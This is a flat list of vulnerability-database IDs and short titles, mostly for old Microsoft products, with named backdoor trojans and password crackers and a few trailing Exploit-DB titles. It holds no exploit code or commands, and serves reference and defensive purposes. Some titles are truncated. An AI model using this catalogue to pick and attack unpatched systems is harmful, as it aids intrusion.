arbitrary file source code [8851] Microsoft Internet Explorer for Macintosh could allow remote AppleScript execution [8850] Microsoft Internet Explorer and Office for Macintosh HTML file:// directive buffer overflow [8844] Microsoft Internet Explorer history allows URLs using the JavaScript protocol [8816] Microsoft Internet Explorer does not clear local Web cache [8815] Microsoft VBScript ActiveX Word object denial of service [8811] Microsoft IIS MS02-018 patch is not installed on the system [8810] Microsoft Outlook allows users access to blocked attachments [8808] Microsoft Outlook Express allows attacker to create false attachment by changing icon [8804] Microsoft IIS redirected URL error cross-site scripting [8803] Microsoft IIS HTTP error page cross-site scripting [8802] Microsoft IIS Help File search cross-site scripting [8801] Microsoft IIS FTP session status request denial of service [8800] Microsoft IIS FrontPage Server Extensions and ASP.NET ISAPI filter error handling denial of service [8799] Microsoft IIS HTR ISAPI ISM.DLL extension buffer overflow [8798] Microsoft IIS SSI safety check buffer overflow [8797] Microsoft IIS ASP HTTP header parsing buffer overflow [8796] Microsoft IIS ASP data transfer heap buffer overflow [8795] Microsoft IIS ASP chunked encoding heap buffer overflow [8786] Microsoft OWC DataSourceControl component could allow an attacker to verify a file`s existence using the &quot [8785] Microsoft OWC Spreadsheet component could allow an attacker to verify a file`s existence using the &quot [8784] Microsoft OWC Chart component could allow an attacker to verify a file`s existence using the &quot [8779] Microsoft OWC Spreadsheet component &quot [8778] Microsoft OWC Spreadsheet component &quot [8777] Microsoft OWC Spreadsheet component &quot [8740] Microsoft Internet Explorer Cascading Style Sheets (CSS) can be used to read portions of local files [8711] Microsoft Office XP spreadsheet component host() function cross-application scripting [8708] Microsoft Outlook 2000 and 2002 executes embedded script in object tag when replying or forwarding HTML mail [8701] Microsoft Internet Explorer cookie allows remote attacker to execute script code in Local Computer zone [8681] Microsoft Exchange OWA using RSA Security SecurID authentication bypass [8667] Microsoft Internet Explorer and Outlook could allow the execution of files within Temporary Internet Files (TIFs) [8658] Microsoft Internet Explorer DYNSRC information disclosure [8615] Microsoft Outlook image tags allows remote attacker to bypass cookie settings [8613] Microsoft Outlook allows remote attacker to embed JavaScript in URLs using HREF attribute [8611] Microsoft Outlook IFRAME tags allows malicious Web sites to embed URLs [8589] Apache HTTP Server for Windows DOS batch file remote command execution [8488] Microsoft Internet Explorer JavaScript location.replace loop denial of service [8480] Sun Java Runtime Environment and Microsoft Virtual Machine (VM) Bytecode Verifier could allow a Java Applet to bypass security restrictions [8473] Microsoft Internet Explorer URL encoded characters could allow an attacker to access cookie information [8471] Microsoft Internet Explorer dotless IP variant could allow rendering of Web sites with incorrect Security Zone [8385] Microsoft IIS specially-crafted request reveals IP address [8382] Microsoft IIS authentication error messages reveal configuration information [8370] ARCserve backup client and Inoculan AV client for Microsoft Exchange stores plain text account information in exchverify.log [8362] Microsoft FrontPage form_results.txt is world readable [8359] Microsoft SQL Server multiple extended stored procedure buffer overflows [8356] Microsoft Outlook X-UIDL: header denial of service [8351] Sun Java Runtime Environment and Microsoft Virtual Machine (VM) Java Applet could be used to redirect browser traffic when using a proxy [8341] Microsoft Internet Explorer 4.0 long OBJECT CLASSID denial of service [8320] RealNetworks RealPlayer for Windows invalid .mp3 file denial of service [8280] Matrix screen saver for Windows 95 bypass password protection [8254] Microsoft Commerce Server 2000 AuthFilter ISAPI filter buffer overflow [8252] Microsoft Internet Explorer VBScript can be used to view local files [8243] Microsoft SQL Server OLE DB provider name &quot [8242] Microsoft Visual C++.Net and Visual C++ insecure buffer overflow protection [8218] Microsoft Internet Explorer Content-Type header cross-site scripting [8198] Microsoft Outlook Express &lt [8191] Microsoft IIS 5.1 specially-crafted .cnf file request could reveal file contents [8174] Microsoft IIS 5.1 .cnf file request could reveal sensitive information [8120] Microsoft Internet Explorer could allow an attacker to execute script despite disabled scripting [8118] Microsoft Internet Explorer could be used to open a program on a remote system [8117] Microsoft Internet Explorer could misrepresent file names in the file download dialog box [8116] Microsoft Internet Explorer HTML &quot [8092] Microsoft Exchange 2000 System Attendant sets incorrect registry permissions [8087] Microsoft Office v. X for Mac OS X PID Checker denial of service [8080] Microsoft Site Server sample sites allow SQL injection [8073] Microsoft Site Server LDAP_Anonymous user account generates weak passwords [8071] Microsoft Site Server ASP files reveals sensitive information [8069] Microsoft Site Server POST command directory traversal [8056] Microsoft IIS is running on the system [8053] Microsoft Site Server &quot [8051] Microsoft Site Server stores LDAP member passwords in plain text [8050] Microsoft Site Server default ASP pages allow cross-site scripting [8048] Microsoft Site Server LDAP_Anonymous default account and password [8036] ILOVEYOU or Love Letter worm uses Microsoft Outlook and mIRC to propagate and attack systems [7969] Microsoft Internet Explorer for Mac OS could allow execution of files [7954] BadBlue uploaded Microsoft Office document macro execution [7947] BadBlue Microsoft Office file viewing script non-existent file request denial of service [7946] BadBlue Microsoft Office file viewing script &quot [7941] Microsoft Internet Explorer CODEBASE value allows remote program execution [7938] Microsoft Internet Explorer HTML form denial of service [7919] Microsoft IIS 4.0 and Norton Internet Security 2001 default permissions could allow an attacker to modify log files [7906] Microsoft Internet Explorer clipboardData object allows a remote attacker to view clipboard information [7900] Microsoft Outlook PGP plug-in saves a decrypted copy of encrypted emails [7885] BioNet backdoor for Windows [7826] Microsoft Internet Explorer showModelessDialog() denial of service [7815] Apache for Windows &quot [7795] Microsoft FrontPage Server Extensions (FPSE) &quot [7788] Microsoft FrontPage Server Extensions (FPSE) &quot [7784] Microsoft Internet Explorer JavaScript OnError allows a remote attacker to determine a file`s existence [7758] Microsoft Internet Explorer GetObject directory traversal allows an attacker to read files [7737] Microsoft Internet Explorer &quot [7725] Microsoft SQL Server C runtime format string attack [7724] Microsoft SQL Server text message query buffer overflow [7712] Microsoft Internet Explorer XMLHTTP redirect reveals contents of file [7703] Microsoft Internet Explorer could allow automatic file download and execution [7702] Microsoft Internet Explorer &quot [7691] Microsoft IIS HTTP GET request with false &quot [7670] Microsoft Outlook Express allows blocked attachments to be opened when the message is forwarded [7663] Microsoft Exchange 5.5 OWA HTML email body embedded script execution [7661] Microsoft Internet Explorer settimeout function in JavaScript can cause the program to crash [7648] Microsoft Outlook Express for Macintosh long message line buffer overflow [7640] Microsoft IIS is present on the system [7636] Microsoft Internet Explorer could allow an attacker to spoof the file extension of a downloadable file [7613] Microsoft IIS allows attackers to create fake log entries [7610] CBlade worm infects Microsoft SQL Servers [7592] Microsoft Internet Explorer allows an attacker to determine password characters [7581] Microsoft Internet Explorer HTTP_USER_AGENT could allow attacker to determine the existence of patch Q312461 [7566] Microsoft IIS 2.0 and 3.0 upgraded to Microsoft IIS 4.0 fails to remove the ism.dll file [7563] Microsoft Zero Administration Kit (ZAK) could allow an attacker to bypass file restrictions [7559] Microsoft Index Server installed with IIS 4.0 could allow a local attacker to obtain physical path information [7558] Microsoft IIS FileSystemObject in showfile.asp could allow remote attackers to read arbitrary files [7545] Microsoft Internet Explorer installation wizard (ie5setup.exe) disables screen saver password and task scheduler [7527] Microsoft SQL Server malformed RPC request denial of service [7526] Microsoft Exchange Server malformed RPC request denial of service [7497] Microsoft Internet Explorer remote file enumeration [7486] Microsoft Internet Explorer &quot [7446] Microsoft ISA Server fragmented UDP packet flood denial of service [7426] Microsoft Internet Explorer may expose authentication information to redirected Web sites [7425] OpenVMS and DECwindows Motif Server allows unauthorized access [7407] Macintosh clients using Windows 2000 NTFS volumes can modify directory permissions [7354] Microsoft SQL Server 6.5 stores the SQLExecutiveCmdExec in registry using weak encryption algorithm [7336] Microsoft Internet Explorer for Mac OS X could allow the automatic execution of downloaded files [7313] Microsoft Internet Explorer allows JavaScript to spoof dialog boxes [7260] Microsoft Internet Explorer command execution with Telnet client in SFU [7259] Microsoft Internet Explorer URL can contain encoded HTTP requests to third-party site [7258] Microsoft Internet Explorer dotless IP could allow rendering of Web sites with incorrect Security Zone [7223] Microsoft Excel and PowerPoint malformed document macro execution [7202] Microsoft IIS 4.0/5.0 escaped percent found [7201] Microsoft IIS 4.0/5.0 malformed double percent sequence [7199] Microsoft IIS 4.0/5.0 malformed hex sequence [7188] Norton Utilities for Windows 95 &quot [7168] Microsoft Exchange OWA deeply-nested folder request denial of service [7118] Microsoft Outlook Express &quot [7093] Norton AntiVirus for Microsoft Exchange could reveal sensitive information to attackers [7089] Microsoft Exchange OWA could allow search of global address list [7052] Microsoft Outlook Express 6 file attachment security feature bypass [7039] Microsoft Exchange OWA denial of service [6995] Microsoft IIS %u Unicode wide character encoding detected [6994] Microsoft IIS %u Unicode encoding detected [6991] Microsoft ISA Server cross-site scripting [6990] Microsoft ISA Server Proxy Service memory leak denial of service [6989] Microsoft ISA Server H.323 Gatekeeper Service memory leak denial of service [6985] Microsoft IIS relative path usage in system file process table could allow elevated privileges [6984] Microsoft IIS specially-crafted SSI directives buffer overflow [6983] Microsoft IIS invalid MIME header denial of service [6982] Microsoft IIS WebDAV long invalid request denial of service [6981] Microsoft IIS URL redirection denial of service [6963] Microsoft IIS HTTPS connection could reveal internal IP address [6914] Multiple Microsoft products malformed RPC request denial of service [6883] Microsoft SFU Telnet denial of service [6882] Microsoft SFU NFS denial of service [6858] Microsoft IIS cross-site scripting patch denial of service [6831] Microsoft Outlook &quot [6800] Microsoft IIS device file request can crash the ASP processor [6748] Microsoft Internet Explorer &quot [6742] Microsoft IIS reveals .asp source code with Unicode extensions [6732] Microsoft Word allows embedded macro to bypass security settings [6730] Microsoft FrontPage Server Extensions Visual Studio RAD Support sub-component buffer overflow [6705] Microsoft IIS idq.dll ISAPI extension buffer overflow [6688] Microsoft Internet Explorer could allow remote attackers to view file contents from a victim`s hard drive [6684] Microsoft SQL Server cached connections could allow an attacker to gain access to the database [6655] Microsoft Outlook and Outlook Express Address Book allows attacker to spoof emails [6652] Microsoft Exchange 2000 OWA script execution [6651] Microsoft ISA Server Web Proxy denial of service caused by embedded code in HTML email [6614] Microsoft Word .asd file macros could automatically execute [6571] Microsoft Word RTF document automatic macro execution [6556] Microsoft Internet Explorer HTML code manipulation could alter the URL displayed in the address bar [6555] Microsoft Internet Explorer with certificate CRL checking enabled could allow Web site spoofing [6549] Microsoft IIS WebDAV lock method memory leak can cause a denial of service [6545] Microsoft IIS FTP weak domain authentication [6535] Microsoft IIS FTP wildcard processing function denial of service [6534] Microsoft IIS URL decoding error could allow remote code execution [6533] PC4800 WLAN network adapter card may reveal SSID(s) in Windows registry [6528] WLLUC WLAN network adapter card may reveal WEP encryption keys and SSID in Windows registry [6527] Apache Web Server for Windows and OS2 denial of service [6526] WLRBT WLAN network adapter card may reveal WEP encryption key and SSID in Windows registry [6525] CW10 WLAN network adapter card may reveal security information in Windows registry [6485] Microsoft IIS 5.0 ISAPI Internet Printing Protocol extension buffer overflow [6448] Microsoft Internet Explorer 5.x allows active scripts using XML stylesheets [6426] Microsoft Internet Explorer altering CLSID action allows malicious file execution [6405] Microsoft Data Access Component Internet Publishing Provider allows WebDAV access [6383] Microsoft ISA Server Web Proxy denial of service [6370] ORiNOCO AS client Windows NT Remote Access Service ppp.log reveals RADIUS user credentials [6361] ORiNOCO AS client software reveals wireless network name and RADIUS user credentials in Windows registry [6306] Microsoft Internet Explorer HTML emails with incorrect MIME headers could allow execution of code [6288] Microsoft Visual Studio VB-TSQL buffer overflow [6265] Microsoft invalid digital certificates could be used for spoofing [6238] Dagger backdoor for Windows 95/98 [6230] Microsoft Internet Explorer command execution with Telnet client in SFU [6205] Microsoft IIS WebDAV denial of service [6172] Microsoft Exchange malformed URL request denial of service [6171] Microsoft IIS and Exchange malformed URL request denial of service [6150] NetDemon backdoor for Windows 95/98 [6086] Microsoft Internet Explorer &quot [6085] Microsoft Internet Explorer scriptlet rendering could allow Web site operators to read files [6029] Microsoft IIS CmdAsp could allow remote attackers to gain privileges [5938] Microsoft Internet Explorer mshtml.dll denial of service [5903] Microsoft IIS 5.0 allows the viewing of files through malformed URL [5823] Microsoft IIS Web form submission denial of service [5785] Microsoft Media Services dropped connection denial of service [5729] Microsoft IIS Far East editions file disclosure [5622] Microsoft SQL XP srv_paraminfo() buffer overflow [5615] Microsoft Internet Explorer file upload form [5614] Microsoft Internet Explorer print template [5575] Microsoft Media Player .WMS script execution [5574] Microsoft Media Player .ASX buffer overflow [5566] Microsoft Internet Explorer 5.5 index.dat file can be used to remotely execute code [5541] CrazzyNet backdoor for Windows [5537] Microsoft Exchange Server has a known username and password [5510] Microsoft Internet Information Service (IIS) ISAPI buffer overflow [5508] Microsoft Outlook client reveals physical path [5504] Microsoft Internet Explorer &quot [5500] Tini backdoor for Windows [5494] Microsoft FrontPage 98 Server Extensions fpcount.exe CGI can be remotely crashed [5470] Microsoft Internet Information Service (IIS) invalid executable filename passing [5458] Rux Tick backdoor for Windows [5441] Microsoft IIS .htw cross-site scripting [5389] Event Horizon backdoor for Windows [5377] Microsoft IIS Unicode translation error allows remote command execution [5367] Microsoft Internet Explorer cached info [5362] Remote Storm backdoor for Windows [5356] Snid X2 backdoor for Windows [5335] Microsoft IIS Index Server directory traversal [5329] Host Control backdoor for Windows [5328] GayOL backdoor for Windows and AOL [5324] TransScout backdoor for Windows [5322] Microsoft Word Mail Merge [5304] Chupacabra backdoor for Windows [5293] Microsoft Internet Explorer exposes users files [5263] Microsoft Office 2000 executes .dll without users knowledge [5202] Microsoft IIS invalid URL allows attackers to crash service [5175] Microsoft Outlook and Outlook Express vCards buffer overflow [5156] Microsoft IIS Cross-Site Scripting [5147] Microsoft Money plain-text password [5127] Microsoft Virtual Machine java applet allows malicious Web site to masquerade as visitor [5124] Microsoft FrontPage Server Extensions device name denial of service [5106] Microsoft IIS 4.0 discloses internal IP addresses [5104] Microsoft IIS allows remote attackers to obtain source code fragments using +.htr [5086] Qaz backdoor for Windows [5080] Microsoft Office 2000 HTML object tag buffer overflow [5075] Microsoft Internet Explorer &quot [5071] Microsoft IIS canonicalization error applies incorrect permissions to certain types of files [5025] Infector backdoor for Windows [5016] Microsoft Excel register.id function [5013] Microsoft Outlook and Outlook Express cache bypass [4960] Microsoft IIS on Win2kPro security button restriction [4953] Microsoft Outlook date header buffer overflow [4951] Microsoft IIS absent directory browser argument [4933] Microsoft SQL Enterprise Manager password disclosure [4899] Microsoft FrontPage Extensions shtml.dll multiple access denial of service [4893] Microsoft mail clients denial of service [4883] Service ticket granted to a Windows 2000 security principal [4864] Authentication ticket granted to a Windows 2000 security principal [4863] Security identifier failed to be written to Windows 2000 security principal sIDHistory [4862] Security identifier added to Windows 2000 security principal sIDHistory [4849] Asylum RAT (Remote Access Tool) backdoor for Windows [4848] Connection backdoor for Windows 95/98 [4845] SniperNet backdoor for Windows 95/98 [4842] Microsoft Internet Explorer and Microsoft Powerpoint 2000 ActiveX object execution [4841] Microsoft Internet Explorer and Microsoft Access 2000 VBA code execution [4814] Syphillis backdoor for Windows 95/98 [4790] Microsoft IIS \mailroot\pickup directory denial of service [4789] Swift Remote backdoor for Windows 95/98 [4757] Microsoft IIS server-side includes (SSI) #exec directive [4710] Norton AntiVirus for Microsoft Exchange unzip buffer overflow [4709] Norton AntiVirus for Microsoft Exchange may enter &quot [4679] Microsoft DNS Server - Name offset exceeding DNS message packet length [4678] Microsoft DNS Server using a large amount of memory [4677] Microsoft DNS Server - Invalid DNS UPDATE message in DNS packet [4676] Microsoft DNS Server - excessive bad packets received [4675] Microsoft DNS Server - Invalid domain name offset in DNS message packet [4672] Logon attempt failure reported by Windows Service Control Manager [4663] Microsoft DNS Server - Invalid domain name [4654] Microsoft DNS Server - Invalid domain name in DNS message packet [4637] Microsoft DNS Server - Domain name exceeding maximum packet length [4635] Microsoft DNS Server - CNAME loop during caching [4627] Microsoft Internet Explorer fails to revalidate certificates within the same session [4624] Microsoft Internet Explorer fails to validate certificates in images or frames [4601] Microsoft Internet Explorer HTML Help file code execution [4582] Microsoft SQL Server DTS package reveals passwords [4569] NetOp bypasses Windows NT security to retrieve files [4558] Microsoft IIS is installed on a domain controller [4500] Microsoft Internet Explorer frame domain verification [4496] Y3K RAT backdoor for Windows [4484] Microsoft FrontPage Server Extensions image mapping components allow remote code execution [4456] Microsoft Internet Explorer external.NavigateAndFind function bypasses cross-frame security [4448] Microsoft IIS ISM.DLL could allow users to read file contents [4447] Microsoft Internet Explorer bug allows Web page operator to view cookie [4446] Microsoft Outlook Express filename overflow could allow attacker to execute files [4445] Microsoft Office UA Control malicious Web operator [4439] Microsoft FrontPage Server Extensions&quot [4430] Microsoft IIS malformed URL extension data denial of service [4399] Microsoft Commercial Internet System (MCIS) Mail server IMAP buffer overflow [4397] NetBIOS requests with a NULL source address can cause Windows 9x to become unstable [4392] Microsoft IIS could reveal source code of ASP files in some virtual directories [4339] Glacier backdoor for Windows [4333] Microsoft FrontPage 98 Server Extensions DVWSSR.DLL file buffer overflow [4302] Microsoft IIS malformed AuthChangUrl request can cause the server to stop servicing requests [4280] Microsoft DNS resolver may accept responses from non-queried hosts [4279] Microsoft IIS escape characters denial of service [4268] Microsoft FrontPage 98 Server Extensions DVWSSR.DLL file could allow remote ASP source retrieval [4232] Microsoft Index Server idq.dll allows remote directory traversal [4227] Microsoft Index Server webhits.dll reveals source of ASP files [4224] Microsoft Excel XLM macros do not generate warning messages [4204] Microsoft IIS virtual UNC share source read [4183] Microsoft IIS could disclose path of network shares [4165] NetSpy 1.2 backdoor for Windows [4152] Microsoft Outlook allows users to manipulate hidden drives [4150] Telecommando backdoor for Windows 95/98 [4149] Satans Backdoor for Windows [4148] Donald Dick backdoor for Windows [4146] Master`s Paradise98 backdoor for Windows [4145] NCX backdoor for Windows [4144] Devil backdoor for Windows [4117] Microsoft IIS chunked encoding post or put denial of service [4110] Microsoft SQL Server remote query abuse [4109] Microsoft Clip Art Gallery CIL file buffer overflow [4105] Sockets de Troie (Socket23) backdoor for Windows [4061] Funtime Apocalypse denial of service tool for Windows [3996] Microsoft Internet Explorer image source redirect [3986] Microsoft IIS ASP could be used to gain sensitive information [3959] Microsoft Direct Access Object (DAO) or JET method denial of service [3892] Microsoft IIS Long URL with excessive forward slashes passed to ASP causes an access violation [3890] Microsoft Index Server error could reveal sensitive path information [3854] Microsoft Office 2000 security setting [3837] Microsoft Internet Explorer Suite 4 HTML buffer overflow [3803] Microsoft Internet Explorer directshow filter (MSDXM.OCX) buffer overflow [3722] A Windows NT user can use SUBST to map a drive letter to a folder [3675] Microsoft DNS server cache pollution can occur if DNS spoofing has been encountered [3668] Microsoft Internet Explorer Cross Frame could be used to view files on client computers [3666] Microsoft Internet Explorer Web Proxy Auto-Discovery could allow clients to accept untrusted proxy setting information [3558] Print Operators group in Windows 2000 contains a suspicious member who might not be authorized [3468] Driver Signing check in Windows 2000 may be disabled to allow non-signed driver to be installed [3443] Domain Administrator group in Windows 2000 contains a suspicious member who might not be authorized [3393] Microsoft FrontPage Extensions authors.pwd file could reveal encrypted passwords [3391] Microsoft FrontPage Extensions service.pwd file could reveal encrypted passwords [3378] Microsoft Virtual Machine could allow a malicious Java applet to bypass security restrictions [3371] Microsoft Excel imports and runs Lotus 1-2-3 or Quattro Pro macros without warning [3326] Total Eclypse backdoor FTP server for Windows [3311] Microsoft Internet Explorer registration wizard ActiveX buffer overflow [3306] Microsoft IIS could allow remote access to servers marked as Restrict Access [3268] Microsoft Internet Explorer uses weak encryption [3246] Microsoft HTML table form Denial of Service [3244] Microsoft Scriptlet.typelib and Eyedog ActiveX controls are unsafe [3222] BackConstruction backdoor for Windows [3221] Microsoft SQL Server 6.5 non-trusted connection successful [3220] Microsoft SQL 6.5 Server shutdown [3219] Microsoft SQL Server 6.5 started [3218] Microsoft SQL Server failed connection [3217] Microsoft SQL Server non-trusted connection successful [3216] Microsoft SQL Server shutdown [3215] Microsoft SQL Server started [3214] Microsoft SQL Server trusted connection successful [3201] Microsoft SQL Server login failed - user not trusted [3200] Microsoft SQL Server login failed - user not Administrator [3199] Microsoft SQL Server login failed - invalid user [3198] Microsoft SQL Server login failed - too many users [3197] Microsoft SQL Server login failed [3196] Microsoft LDAP server blacklist failed [3195] Microsoft LDAP server permanent blacklist [3194] Microsoft LDAP server temporary blacklist [3162] BigGluck backdoor for Windows [3161] Ultors backdoor for Windows [3156] Microsoft Jet Text I-ISAM allows users to alter system files [3155] Microsoft Jet VBA shell execution [3151] StealthSpy backdoor for Windows [3150] ServeMe backdoor for Windows 95/98 [3149] The Unexplained 1.0 backdoor for Windows 95/98 and Windows NT [3148] SecretService backdoor for Windows 95/98 [3147] Truva 1.2 backdoor for Windows 95/98 [3143] RWS backdoor for Windows [3131] AOL Admin backdoor for Windows and AOL [3130] Doly backdoor for Windows [3122] Deltasource backdoor for Windows [3120] The Thing backdoor for Windows [3119] Progenic backdoor for Windows 95/98 and Windows NT [3118] Schwindler backdoor for Windows 95/98 [3117] Microsoft FrontPage long URL buffer overflow [3115] Microsoft IIS and SiteServer denial of service caused by malformed HTTP requests [3113] Hacker`s Paradise backdoor for Windows 95/98 and Windows NT [3112] Prosiak backdoor for Windows [3111] Millenium backdoor for Windows [3110] HVL-RAT backdoor for Windows and AOL [3100] Frenzy backdoor for Windows 95/98 [3099] Blazer5 backdoor for Windows 95/98 and Windows NT [2761] Microsoft Office 97 files are out of date [2686] Microsoft Outlook long file name patch not applied [2685] Microsoft Outlook Express long file name patch not applied [2675] Microsoft IIS 4.0 samples installation on Web server [2673] Microsoft IIS samples installation on Web server [2671] Microsoft IIS Passive FTP patch not applied (asp.dll out of date) [2670] Microsoft IIS Passive FTP patch not applied (wam.dll out of date) [2669] Microsoft IIS Passive FTP patch not applied (w3svc.dll out of date) [2668] Microsoft IIS Passive FTP patch not applied (infocomm.dll out of date) [2662] Microsoft IIS CGI overflow [2661] Microsoft Internet Explorer MK overrun [2444] Microsoft Internet Explorer unsigned ActiveX download [2412] Microsoft IIS account is member of Domain Users [2390] NetMonitor backdoor for Windows 95/98 and Windows NT [2389] Backdoor2 for Windows [2387] Forced Entry backdoor for Windows [2386] Coma backdoor for Windows 95/98 [2381] Microsoft IIS and SiteServer Showcode.asp sample file allows remote file viewing [2326] phAse zero backdoor for Windows 95/98 and Windows NT [2324] GirlFriend backdoor for Windows [2323] Portal of Doom backdoor for Windows [2322] GateCrasher backdoor for Windows [2321] NetSphere backdoor for Windows and ICQ [2310] EvilFTP backdoor FTP server for Windows [2302] Microsoft IIS using double-byte code pages could allow remote attackers to retrieve source code [2290] DeepThroat backdoor for Windows [2283] CMail server for Windows installs with a default administrator password [2282] Microsoft IIS bdir.htr allows remote traversal of directory structure [2281] Microsoft IIS buffer overflow in HTR requests can allow remote code execution [2252] Microsoft Jet database engine allows embedded VBA strings, which could allow execution of commands [2245] SubSeven backdoor for Windows [2244] Microsoft Internet Explorer favorites feature malicious icon file [2229] Microsoft IIS ExAir sample site denial of service [2216] Microsoft Internet Explorer crossframe vulnerability allows scripts to run in elevated context [2214] Microsoft Internet Explorer Son of Cuartango issue allows remote file retrieval [2213] Microsoft Internet Explorer Untrusted Scripted Paste issue could allow remote file retrieval [2209] Microsoft Internet Explorer treats dotless IP addresses as members of the local Intranet zone [2204] Timbuktu is a remote control server for Macintosh and Windows computer [2186] Microsoft Excel virus warning features could possibly be bypassed by malicious files [2185] Microsoft IIS and Site Server sample programs can be used to remotely view files [2173] Microsoft Internet Explorer FSO could allow remote file manipulation from a Web server [2161] Microsoft Internet Explorer DHTML edit control can be used to read arbitrary files [2142] Microsoft SQL Server allows users of remote SQL Servers to connect allowing unauthorized users of those servers access [2140] Microsoft SQL Server trojan horse found in system stored procedures [2139] Unencrypted Microsoft SQL Server triggers found [2136] Microsoft SQL Server device files should be on NTFS partitions [2134] Microsoft SQL Server backups should be performed regularly [2133] Microsoft SQL Server replication is enabled [2132] Microsoft SQL Server Trace Flags should be off [2130] Microsoft SQL Server protocols found that allow packet sniffing [2128] Microsoft SQL Server bug found that prohibits revoke permissions on certain tables [2119] Microsoft SQL Server registry extended stored procedures found that could be used to read or write to the registry [2095] Microsoft SQL Server OLE Automation extended stored procedures were found that can be used to reconfigure the security of other services [2094] Microsoft SQL Server password encryption is not enabled for all login Ids [2093] The account under which the Microsoft SQL Server service is running is not in compliance with policy [2092] Microsoft SQL Server extended stored procedure xp_sprintf buffer overflow [2077] Microsoft SQL Server extended stored procedure xp_sqlinventory can be used to crash SQL Server [2070] Microsoft Internet Explorer allows remote files to be retrieved by a malicious user [2069] Microsoft Internet Explorer can allow malicious pages to spoof legitimate, trusted sites [2036] Microsoft PWS could be exploited to remotely read arbitrary files [1969] Microsoft Exchange LDAP denial of service [1823] Microsoft IIS long GET request denial of service [1822] ARCserver Windows NT backup agents use very weak encryption for passwords [1803] Unencrypted Microsoft SQL Server stored procedures found [1780] Microsoft Office 98 documents may be saved with sensitive information [1774] Microsoft Access databases use weak passwords [1770] Microsoft SQL Server SQLMail allows logins to send email [1769] Latest Microsoft SQL Server Service Packs are not installed [1764] Latest Windows NT Service Pack is not installed [1762] Microsoft SQL Server permissions on extended stored procedures found that are not in compliance with policy [1761] Microsoft SQL Server is configured to execute stored procedures at startup that could be used as backdoors [1760] Microsoft SQL Server statement permissions found that are granted to users other than dbo [1759] Microsoft SQL Server objects not owned by database owner [1757] Microsoft SQL Server allows direct system table updates to be denied [1750] Microsoft SQL Server logins during unauthorized hours found [1749] Microsoft SQL Server permissions on system tables found granted to public [1737] Microsoft Excel CALL function can execute programs without user warning [1735] Microsoft IIS with Visual InterDev no authentication [1715] Microsoft SQL Server object permissions granted to groups are non-compliant with policy [1714] Microsoft SQL Server user permissions found that are not in compliance with policy [1713] Microsoft SQL Server Enterprise Manager leaves traces of unencrypted sa password in registry when changing authentication mode of a registered server [1712] Microsoft SQL Server Enterprise Manager leaves traces of previous unencrypted sa passwords in registry [1711] Microsoft SQL Server Enterprise Manager stores unencrypted sa password in registry [1710] Microsoft SQL Server integrated logins found and should be reviewed [1709] Microsoft SQL Server guest user IDs found [1708] Microsoft SQL Server stale logins found [1705] Microsoft SQL Server orphaned user IDs found that could result in unauthorized permissions being granted [1704] Microsoft SQL Server mismatched user IDs could result in granting of unauthorized permissions [1703] Microsoft SQL Server can be configured to audit failed or successful logins [1702] Microsoft SQL Server can be configured for different authentication methods [1701] Microsoft SQL Server set to view NT username, not hostname when viewing current users [1700] Microsoft SQL Server guest login found [1697] Microsoft SQL Server allows easily-guessed passwords [1675] Microsoft Internet Explorer 4.0 connection-reuse problem [1656] Microsoft IIS 4.0 allows user to avoid HTTP request logging [1654] Microsoft IIS remote FTP buffer overflow [1652] Quakenbush Password Appraiser publishes Windows NT user passwords to the Internet [1638] Microsoft IIS crashes processing some GET commands [1530] Microsoft IIS 3.0 newdsn.exe sample application allows remote creation of arbitrary files [1459] Blank sa password on Microsoft SQL Server [1458] Blank probe password found on Microsoft SQL Server [1457] Microsoft SQL server detection (TCP) [1451] Microsoft SQL Server detection (named pipes) [1422] CSM Proxy 4.1 remote buffer overflow crashes proxy and underlying Windows NT system [1383] Microsoft TCP/IP allows an attacker to reset connections [1376] Microsoft Proxy 2.0 denial of service [1368] Microsoft IIS 4.0 allows file execution in the Web site directory [1354] Windows NT Domain Administrators group includes non-default user [1273] Microsoft IIS special characters allowed in shell [1272] Microsoft IIS CGI scripts run as system [1271] Microsoft IIS version 2 installed [1270] Microsoft IIS incorrect permissions on restricted item [1269] Microsoft IIS incorrect Web permissions [1268] Microsoft IIS SSI #exec enabled [1228] NetBus trojan horse for Windows [1226] Microsoft DNS Server - DNS Zone Transfers from high ports [1223] Microsoft Exchange Server SMTP and NNTP denial of service [1216] Microsoft IIS SSL patch not applied [1215] Microsoft IIS Passive FTP patch not applied [1212] Microsoft IIS unauthorized ODBC data access with RDS [1211] Remote DeskLink for Windows 95 is installed [1125] Microsoft IIS ASP DATA issue could reveal source code [949] Microsoft IIS server script debugging enabled [948] Microsoft IIS samples installed on Web server [943] Microsoft Office installed on Web server [936] Microsoft IIS NTFS insecure permissions [935] Microsoft IIS executable paths [917] Microsoft Internet Explorer MK overrun [916] Microsoft Internet Explorer Embed issue [910] Microsoft Office 97 files are out of date [908] Microsoft FrontPage extensions under Unix create world readable password files [621] Microsoft IIS 3.0 script source revealed by appending 2E to requests [587] Microsoft Internet Explorer Freiburg text viewing issue [562] Microsoft Office file manager allows users to see files without access [561] Microsoft FrontPage 1.1 allows users to write to executable directories [533] Program exists to replace a password on a Windows NT computer [527] L0phtCrack 1.5 can crack Windows NT passwords [470] Microsoft Excel passwords are easily cracked [463] Microsoft Internet Explorer 3.0 allows remote command execution [462] Microsoft Internet Explorer 3.0.1 .ISP script file execution [459] Microsoft Internet Explorer divulges sensitive information in response to NTLM requests [456] Microsoft Internet Explorer and Netscape Java applets can open network connections to a server [397] Microsoft cd .. Bug [387] SMB NetBIOS Test: Possible Windows NT dotdot denial of service [385] Microsoft Internet Explorer has the check security certificate before sending option disabled [362] Microsoft Internet Explorer entering/leaving a secure site warning disabled [361] Microsoft Internet Explorer is outdated [360] Microsoft Internet Explorer non-secure form submission warning is disabled [359] Microsoft Internet Explorer has Java enabled [358] Microsoft Internet Explorer Form redirection enabled [357] Microsoft Internet Explorer has check security certificate before viewing option disabled [356] Microsoft Internet Explorer allows secure content to be cached [355] Microsoft Internet Explorer allows ActiveX controls to be automatically executed [354] Microsoft Internet Explorer active scripting is enabled [353] Microsoft Internet Explorer allows active content to be automatically downloaded [352] Microsoft Internet Explorer has low active content security [351] Microsoft Internet Explorer accept cookies warning disabled [336] Microsoft IIS ASP dot bug [295] WebSite 1.1 for Windows NT winsample buffer overflow [256] Microsoft IIS can be remotely crashed by excessively long client requests [185] Unknown Windows service [7] Microsoft IIS ASP source visible Exploit-DB - https://www.exploit-db.com: [30825] Microsoft Windows Media Digital Rights Management ActiveX Control Buffer Overflow Vulnerability [30645] Microsoft Windows URI Handler Command Execution Vulnerability [30636] Microsoft Windows 2000/2003 Recursive DNS Spoofing Vulnerability (2) [30635] 